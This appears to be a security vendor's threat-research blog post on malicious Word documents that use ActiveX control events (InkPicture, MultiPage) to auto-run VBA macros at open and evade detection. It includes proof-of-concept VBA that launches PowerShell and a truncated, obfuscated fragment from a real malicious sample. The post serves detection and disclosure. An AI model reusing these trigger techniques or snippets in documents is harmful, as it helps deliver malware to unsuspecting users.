Malicious Microsoft Office Documents Move Beyond InkPicture
In late August we began to detect malicious Microsoft Word documents that contained VisualBasic (VB) macro code and the code appeared to be triggering when the document was opened. However, the documents did not contain any of the standard events used to launch VB macro code when a document is opened, including Document_Open, or Auto_Open events. Upon closer examination, all the documents contained the ActiveX InkPicture control and the Painted event. The InkPicture Painted event is triggered upon document open, just like the Document_Open event. Using ActiveX controls like InkPicture and events associated with it, an attacker can create malicious documents that launch VB macro code when the document is opened without using the standard document open event triggers. Security solutions that examine documents and only look for the standard document open events are likely to miss documents that use ActiveX controls like InkPicture to launch code when the document first opened.
Other vendors made note of the use of InkPicture ActiveX controls to launch VB macro code when the document is opened  .
It was also immediately obvious that InkPicture events other than Painted, like Painting or MouseHover, could be used to launch VB macro code at document open. In addition, Microsoft Office ActiveX controls other than InkPicture could also be used to launch VB macro code at document open.
We created a number of proof-of-concept documents using other events associated with InkPicture to observe how these samples behaved in the Threat Grid sandbox.
For example, this proof-of-concept sample launches powershell.exe using the InkPicture Painting event when the document opens.
Dim Once As Boolean Private Sub InkPicture1_painting(ByVal hDC As Long, ByVal Rect As InkRectangle, Allow As Boolean)
If Once Then Exit Sub Once = True Shell ("powershell.exe")
Figure 1: shows powershell.exe being launched using the InkPicture Painting event when document opens
This proof-of-concept sample launches powershell.exe using the InkPicture MouseHover event when the document opens, this event triggers when the mouse is on top of the InkPicture control, and triggers automatically if the the mouse starts over the document when it opens, or the user moves the mouse on top of the document while it is open.
Dim Once As Boolean Private Sub InkPicture1_MouseHover()
If Once Then Exit Sub Once = True Shell ("powershell.exe")
Figure 2: powershell.exe is launched using the InkPicture MouseHover event when the document opens
We added detection for these proof-of-concept samples as well as the means to detect new variants using other ActiveX controls.
Other researchers noted that InkPicture events in addition to Painted, and ActiveX controls other than InkPicture could be used to launch VB macros when a document was opened .
We have now begun to detect in-the-wild samples using InkPicture events other than Painted. We have also begun to detect in-the-wild samples using ActiveX controls other than InkPicture to launch VB macro code when a document is opened.
For example, we detected a very small number of documents using the MouseEnter event that is triggered at document open if the mouse is over the document.
Private Sub InkPicture1_MouseEnter() Dim first As String Dim second As String Dim third As String Dim fourth As String Dim fifth As String Dim sixth As String Dim seventh As String Dim eighth As String Dim ninth As String Dim tenth As String Dim eleventh As String Dim twelfth As String Dim last As String first = ChrW(99) & ChrW(109) & ChrW(100) & ChrW(46) & ChrW(101) & ChrW(120) & ChrW(101) & ChrW(32) & ChrW(47) & ChrW(99) second = ChrW(32) & ChrW(80) & ChrW(111) & ChrW(119) & ChrW(101) & ChrW(114) & ChrW(83) & ChrW(104) & ChrW(101) & ChrW(108) third = ChrW(108) & ChrW(32) & ChrW(40) & ChrW(78) & ChrW(101) & ChrW(119) &
Over the weekend of October 15 and 16 we detected a large number of documents using the ActiveX control MultiPage to automatically launch VB macro code at document open. These documents contain the ActiveX MultiPage control and use the associated Layout event. The Microsoft documentation indicates the Layout event triggers when, “… a form, Frame, or Multipage changes size.” 
The malicious documents, and proof-of-concept documents we created, demonstrate the MultiPage control’s Layout event will trigger automatically when a document opens.
This is an example of a the Layout event from a malicious sample:
Public Sub Adbvy_Layout(ByVal hdpmymr As Long) If MdsMR Then Exit Sub MdsMR = True gHLPhAD End Sub Public Sub gHLPhAD() On Error GoTo vdvunp PAaPbaC tcqmPm BXGkJ Exit Sub vdvunp: End Sub
The ActiveX controls InkPicture and MultiPage are just 2 of many ActiveX controls supported by Microsoft Office. Many of these ActiveX controls have associated events that can be triggered if a document is simply opened and macros are enabled.
Microsoft Office does not enable untrusted macros by default, but based on the fact users can manually enable macros and the sheer volume of malicious documents with embedded VB macros we see, attackers are finding success using these kinds of documents. We expect to see attackers further expand the use of ActiveX controls and further evolve techniques to avoid detection.
Example malicious document SHAs:
21f6d96f923e03ab4bd9b4b03005749be5617b4ed12dd1894b63672b8ee05ba2 4dd97f3e6ab0b8220c944845bb6daac243ddcf800b4bab315c20ea9869dd976e 51ec277f9eba95e9b81885b17d914ed0ef31ceb93f95ea5cb7e6bcc6d5fc3efe 9b28b2266ccfb409153eeacefb76f3a17de486a51d19c56deeac92fbd2db947b b7d0bf849efe2ecaa6a614c4a02c22d73ce73a2d3747076afe5833385ba92860 c35495bc7483a8a71a89dd8859ee16ad1c73e251b1995165a4963522dddf0e42
Be sure to tune in to our webinar next week, The Ransomware Threat: New Tactics and How to Fight Back, where experts Eric Hulse and Josh Reynolds of Cisco Research and Efficacy Team (RET) will discuss the ransomware threat and how to fight back. Register to attend here.